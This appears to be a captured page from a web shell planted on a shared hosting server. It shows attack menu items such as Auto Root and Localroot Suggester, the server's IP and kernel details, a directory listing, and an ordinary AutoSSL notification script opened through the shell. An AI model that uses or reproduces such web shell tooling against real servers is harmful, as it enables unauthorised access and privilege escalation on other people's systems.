Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
cron
[ DIR ]
drwxr-xr-x
2025-07-23 04:12
add-pgsql-ipv6-support.sh
564
B
-rwxr-xr-x
2022-09-28 10:30
allow_cl.sh
3.3
KB
-rwxr-xr-x
2024-03-05 16:15
auth-removal.sh
1.95
KB
-rwx------
2023-01-23 13:29
block_ssh.sh
1.15
KB
-rwxr-xr-x
2023-05-23 21:01
cfm_control
4.65
KB
-rwxr-xr-x
2024-03-28 12:14
check_autossl_excluded.sh
6.88
KB
-rwxr-xr-x
2023-05-22 11:59
convert_to_clos.sh
5.73
KB
-rwxr-xr-x
2023-02-09 14:50
convert_to_core.sh
276
B
-rwx------
2025-04-01 06:33
disable_cpbackups.sh
1.39
KB
-rwxr-xr-x
2024-10-10 07:11
domain_check.py
6.24
KB
-rwxr-xr-x
2024-08-27 10:40
grubinst6.sh
230
B
-rwxr-xr-x
2022-10-27 11:41
grubinst7.sh
323
B
-rwxr-xr-x
2024-01-24 12:57
install-ipa.sh
2
KB
-rwxr-xr-x
2024-09-26 04:24
install-ipa.sh.bak
2.37
KB
-rwxr-xr-x
2023-07-05 13:07
install_cloudlinux.sh
1.31
KB
-rwxr-xr-x
2022-09-29 15:30
install_csf.sh
2.91
KB
-rwx------
2023-05-08 10:57
install_elasticsearch.sh
2.19
KB
-rwx------
2022-07-25 14:24
install_litespeed.sh
4.33
KB
-rwx------
2024-06-13 10:28
install_multiphp.sh
976
B
-rwx------
2022-10-10 14:55
install_redis.sh
709
B
-rwx------
2022-09-28 10:30
ipmicfg
429.04
KB
-rwxr-xr-x
2023-10-04 10:59
lets_encrypt_accept.sh
306
B
-rwxr-xr-x
2024-05-14 09:32
mailqueue_check.sh
1.65
KB
-rwxr-xr-x
2022-04-11 09:40
mysql_minor_upgrade.sh
9.33
KB
-rwxr-xr-x
2024-09-11 17:25
server-scripts_deployer.sh
13.54
KB
-rwxr-xr-x
2024-03-28 12:59
set_autossl_onlynotify_expiry.sh
1.91
KB
-rwxr-xr-x
2022-09-14 08:37
updatecfips.sh
1.62
KB
-rwxr-xr-x
2023-05-22 11:59
wp_plugin_scan.py
14.8
KB
-rw-------
2025-01-21 11:31
Save
Rename
#!/bin/bash # Ref- SYSENG-14139 - Script to Manage AutoSSL Notifications # autossl_option="$1" # keep existing metadata - just in case echo -e "$(date)\n$(whmapi1 --output=jsonpretty get_autossl_metadata)" >> /var/log/get_autossl_metadata_original.log autossl_expiryonly_notify() { # Only enables: "User Notifications -> Notify the user for AutoSSL certificate request failures only" whmapi1 set_autossl_metadata metadata_json='{ "notify_autossl_expiry_user":1, "notify_autossl_expiry_coverage_user":1, "notify_autossl_renewal_coverage_user":1, "notify_autossl_renewal_coverage_reduced_user":1, "notify_autossl_renewal_coverage_reduced":0, "notify_autossl_expiry_coverage":0, "notify_autossl_renewal_coverage":0, "notify_autossl_renewal_uncovered_domains":0, "notify_autossl_renewal_user":0, "notify_autossl_renewal":0, "notify_autossl_renewal_uncovered_domains_user":0, "notify_autossl_expiry":0, "clobber_externally_signed":0 }' } autossl_default_notify() { # Enables (default - cpanel setting): # User Notifications -> Notify the user for AutoSSL certificate request failures, warnings, and deferrals. # Administrator Notifications -> Notify the administrator for AutoSSL certificate request failures, warnings, and deferrals. whmapi1 set_autossl_metadata metadata_json='{ "notify_autossl_renewal_uncovered_domains_user":1, "notify_autossl_expiry_coverage_user":1, "notify_autossl_expiry_user":1, "notify_autossl_expiry":1, "notify_autossl_expiry_coverage":1, "notify_autossl_renewal_coverage_reduced_user":1, "notify_autossl_renewal_coverage_reduced":1, "notify_autossl_renewal_coverage_user":1, "notify_autossl_renewal_coverage":1, "notify_autossl_renewal_uncovered_domains":1, "notify_autossl_renewal_user":0, "notify_autossl_renewal":0, "clobber_externally_signed":0 }' } if [ "${autossl_option}" == "reset" ]; then autossl_default_notify else autossl_expiryonly_notify fi